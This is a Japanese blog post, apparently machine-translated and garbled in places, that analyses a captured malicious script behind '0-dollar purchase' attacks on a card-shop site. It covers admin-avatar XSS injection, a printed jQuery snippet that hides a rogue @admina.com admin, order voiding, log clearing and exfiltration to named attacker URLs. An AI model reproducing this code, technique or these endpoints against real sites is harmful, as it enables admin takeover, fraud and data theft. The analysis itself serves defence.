奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1

見どころ 1年前 (2023) mjjfaka
5,549 0
広告も素晴らしい。

序文

最近、ヘテロダインを狙ったゼロドル買い占めが激しさを増しているのは、作者がウェブサイトを適切に保護していなかったからだ。熱狂的なネットユーザーだけでなく、独自のキャプチャ脆弱性悪用スクリプトによると、ここに分析記事シリーズを書く。この記事の脆弱性スクリプトの著者は、アバターインジェクションxssコードの使用は、その後、この時点で悪意のあるコードを実行するように設計された心理のバックグラウンドログを表示するには、ハッキングされての管理者の恐怖を使用するように、ゼロ購入の目的を達成するために管理者の権限の使用を達成するために。

最近、ヘテロダインを狙った0円購入が激しさを増しているのは、作者が自分のウェブサイトを適切に保護していなかったからだ。熱狂的なユーザーと彼ら自身が捕獲した脆弱性悪用スクリプトに基づいて、この分析記事シリーズを執筆しています。
日々の収入がゼロで、カードも持っていない限り、ハッキングされることを恐れないということはある。
奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1

ここに宣言する

悪意のある悪用を防ぐため、この投稿のコードと説明はすべてぼかしてあります。

中抜き

この記事の脆弱性スクリプトの作者は、アバターインジェクションxssコードの使用は、その後、心理学のバックグラウンドログを表示するには、ハッキングされての管理者の恐怖を使用して、この時点で悪意のあるコードの設計を実行するように、ゼロ購入の目的を達成するために管理者の権限の使用を達成するために。

コード解剖

悪意のあるコード・スクリプトのアドレス

https://jiaoben.keeta1.top/

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
ダウンロードしたところ、難読化されていることがわかった。
悪用を防ぐため、以下のコードは読み取り可能なレベルまでしか復号化されていない。
一般的な構成は以下の通り。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1

まず、@admina.comで管理者を追加します。
奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1

$("td")["each"](function (_0x36ba71, _0x348775) {.
	console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
  if (_0x348775["innerHTML"]["indexOf"]("@admina.com") != -1) {
    var _0x53991d = $(this)["parent"]();
    _0x53991d["remove"]().
  }
})

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
アイデアは、すべてのテーブルを繰り返し、@admina.comを含む値を持つテーブルが見つかった場合、その親要素を削除することです。
たまたま管理者のリストがテーブルになっていて、@admina.comを含む管理者を隠すことができる。つまり、管理者はバックエンドには一切表示されず、データベースにのみ表示されます。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
上記の結果を実行したところ、管理職はいなくなった。
唯一の欠点は、最下行の「レコードを1件から1件表示、合計1件表示」を1件減らすことだ。そうしないと機能しない。
そしてキーハッカー機能だ。
奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
まず、タイトルによると、バックグラウンドで操作ログのインターフェイスかどうかを判断する
そして、悪意のあるコードを実行するためのタイマーが有効になる。
タイマー内の悪質なコードは、バックグラウンドでロギング・オペレーター・インターフェースになければ実行されない。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
まずカードにリクエストして、ユーザー名toptoonesのユーザーIDを見つける。
そして、返されたidに基づいて、次のようにする。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
まずこのユーザーを削除する
次に、注文破棄プラグインを呼び出して、このユーザーの注文を破棄する。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
このプラグインがインストールされていない場合、この古い6はまた、あなたがプラグインショップからダウンロードし、プラグインをアクティブにし、注文を破棄し、プラグインを閉じ、プラグインをアンインストールするのに役立つapiを呼び出すために思慮され、ところで、あなたは、バックグラウンドログをクリアするのに役立ちます。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
そして、悪意のある管理者を隠すと最初に書いてある管理者アバターからコードを注入し、バックエンドにログインするとすぐに悪意のあるコードが起動するようにする。
そして、あなたの情報をバックエンドにアップロードする。

https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
そして、バックエンドにイージーペイメントプラグインがあるかどうかをチェックし、あればコードを注入する。支払い設定を変更するべきだったのだろうが、何らかの理由で変更しなかった。

奇妙なヘアピン0ドル購入の脆弱性を悪用したスクリプト分析-1
また、バックグラウンドのガードも慎重に処理する
最後に、ログの消去とデータの転送がある。

概要

権利放棄空想する(異次元)
現実を見る
別のヘアブラシを用意しろ、作者は姿を見せなかった。

広告も素晴らしい。